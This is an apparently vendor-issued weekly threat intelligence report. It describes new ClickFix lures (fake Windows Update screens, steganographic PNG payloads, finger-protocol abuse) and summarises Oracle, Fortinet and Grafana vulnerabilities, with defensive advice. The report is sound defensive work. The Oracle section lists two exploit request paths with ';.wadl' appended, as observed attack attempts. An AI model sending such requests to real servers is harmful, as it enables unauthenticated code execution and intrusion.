Cyber Threat Intelligence Report

This week, we briefed our clients on new lures being used by the “Most Common Attack Method in 2025" (observed in 47% of all attacks) - ClickFix.

 KEY TAKEAWAYS 

• New ClickFix campaigns using new lures and payload delivery methods. Learn how to protect your organization.

• Critical and high severity vulnerabilities in Oracle, Fortinet, and Grafana, plus updates to CISA KEV, patch now!

New ClickFix Tricks

 The social engineering technique known as ClickFix has rapidly become the most common initial access method for threat actors in 2025. According to Microsoft's "Digital Defense Report 2025", ClickFix was observed in 47% of attacks, surpassing phishing as the #1 method. As the ClickFix method approaches a year of mainstream exploitation, threat actors are expanding upon the concept and inventing even more creative ways to entice unsuspecting users to run malicious commands. Additionally, threat actors are using more creative methods to download and execute malicious payloads after the user runs the commands. 

New Lure - Windows Update Screen

Recent reports from Huntress and Acronis have highlighted a new variant of ClickFix that leverages an additional technique called screen hijacking, where the ClickFix lure is merged with a fake Windows Update screen. Using this technique, the lure takes over the full screen, showing the well-known blue background used in Windows updates, tricking the user into running the malicious command in order to “complete” the Windows update.

 Fig. 1: ClickFix Fake Windows Update Using Screen Hijacking | Source: Acronis 

Per the Acronis blog, the threat actors that are using this screen hijacking technique are deploying it across a variety of fake adult websites, which adds to the psychological pressure to complete the "update". 

ClickFix Steganography

Researchers at Huntress identified a ClickFix campaign leveraging heavy obfuscation, encryption, and steganography to facilitate loading malicious code into memory. The threat actors imbed the malicious code directly within the pixel data of PNG images, where separate PowerShell and .NET assembly scripts extract the payload from the image. The final result is the deployment of LummaC2 and Rhadamanthys information stealers. This campaign also leveraged the fake Windows Update prompt. 

Fig 2: ClickFix + Steganography Attack Cycle | Source: Huntress

Finger Protocol

Several recent ClickFix campaigns have begun to use a decades-old protocol, known as finger. Historically, this protocol was used to look up information about local and remote computers on Unix and Linux systems. The command was eventually added to Windows systems. In normal scenarios, running the command returns basic information about a user, including their login name, home directory, phone numbers, last seen time, and more. The ClickFix campaigns are using finger in the initial copy/paste command to retrieve additional payloads. In one instance documented on /r/MalawreAnalysis on Reddit, the finger command retrieves additional commands which create a random named file path, copies curl.exe to a random filename, and uses that executable to download a ZIP archive disguised as a PDF file. A Python malware package is then extracted from the ZIP archive.

How to Protect Your Organization

• As with all ClickFix attacks, user awareness training is crucial. At the end of the day, regardless of the complexity and sophistication of the commands run and the malware executed, this is a social engineering attack that relies on the user running the initial command themselves. Ensure users are aware of the different methods threat actors are leveraging to trick users in these attacks.
• Ensure fully up-to-date EDR solutions are deployed across all endpoints.
• Use a web gateway or firewall policy to block web traffic based on content. Adult sites, gambling, gaming, streaming, and other site content categories that have no business use case can be blocked. This single action can prevent a large number of malware infections.
• Block the finger protocol at the firewall. This protocol has no modern use case and should not be allowed through the firewall. Only ports and protocols that are absolutely necessary to the function of the business should be allowed.

Resources:

• https://www.huntress.com/blog/clickfix-malware-buried-in-images

• https://www.acronis.com/en/tru/posts/fake-adult-websites-pop-realistic-windows-update-screen-to-deliver-stealers-via-clickfix/

• https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-update-screen-to-push-malware/
  

• https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
  

• https://www.reddit.com/r/MalwareAnalysis/comments/1osuo87/i_just_fell_for_verify_you_are_human_win_r_what/
  

• https://www.intel471.com/blog/clickfix-tricking-users-into-installing-infostealers
  

• https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=1

Vulnerability Roundup

Oracle Identity Manager 0-Day

CISA has warned of a remote code execution (RCE) vulnerability in Oracle Identity Manager that is being actively exploited in the wild. Tracked as CVE-2025-61757, the vulnerability is a pre-authentication (authentication bypass) RCE in the product's REST API, allowing attackers to remotely exploit the flaw without the need for valid credentials. The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. The patch was issued in Oracle's October 2025 Security Updates, which was released on October 21. Administrators are urged to patch as soon as possible if they have not done so already. According to Johannes Ullrich, Dean of Research for SANS Technology Institute, early exploitation attempts of this vulnerability targeted the following endpoints (notice the ;.wadl appended to the end):

/iam/governance/applicationmanagement/templates;.wadl
/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl

• https://slcyber.io/research-center/breaking-oracles-identity-manager-pre-auth-rce/
  
• https://isc.sans.edu/diary/Oracle+Identity+Manager+Exploit+Observation+from+September+CVE202561757/32506/
  
• https://www.oracle.com/security-alerts/cpuoct2025.html
  
• https://www.bleepingcomputer.com/news/security/cisa-warns-oracle-identity-manager-rce-flaw-is-being-actively-exploited/
  
• https://nvd.nist.gov/vuln/detail/CVE-2025-61757

Yet Another Fortinet 0-Day

Fortinet recently released security updates for another 0-day flaw in their FortiWeb product. Tracked as CVE-2025-58034, the flaw is an OS Command Injection vulnerability that is low complexity and does not require user interaction. Per the FortiGuard advisory for the vulnerability, successful exploitation allows for an attacker to "execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands." The following table shows affected versions and their corresponding fixed versions:

• https://fortiguard.fortinet.com/psirt/FG-IR-25-513
• https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-fortiweb-zero-day-exploited-in-attacks/

Maximum Severity Flaw in Grafana

Grafana, an open-source data analytics and monitoring tool, recently disclosed a maximum severity vulnerability in Grafana Enterprise. The vulnerability, tracked as CVE-2025-41115, affects the SCIM (System for Cross-domain Identity Management) component of Grafana Enterprise. Successful exploitation allows an attacker to elevate privileges or impersonate another user. Affected versions are Grafana Enterprise 12.0.0 to 12.2.1. In order to be vulnerable, the following conditions must be met: 

• The enableSCIM feature flag is set to true
• The user_sync_enabled config option in the [auth.scim] block is set to true
• The vulnerability has been fixed in the following version:
• Grafana Enterprise 12.0.6+security-01
• Grafana Enterprise 12.1.3+security-01
• Grafana Enterprise 12.2.1+security-01
• Grafana Enterprise 12.3.0

• https://grafana.com/blog/2025/11/19/grafana-enterprise-security-update-critical-severity-security-fix-for-cve-2025-41115/
  

• https://thehackernews.com/2025/11/grafana-patches-cvss-100-scim-flaw.html

CISA KEV Additions

The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:

• CVE-2021-26829 - OpenPLC ScadaRB Cross-site Scripting Vulnerability
• CVE-2025-61757 - Oracle Fusion Middleware Missing Authentication for Critical Function Vulnerability
• CVE-2025-13223 - Google Chromium V8 Type Confusion Vulnerability
• CVE-2025-58034 - Fortinet FortiWeb OS Command Injection Vulnerability

This report is provided FREE to the cybersecurity community.

Visit our Cyber Threat Intelligence Blog for additional reports.

Subscribe to be notified of future Reports:

NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.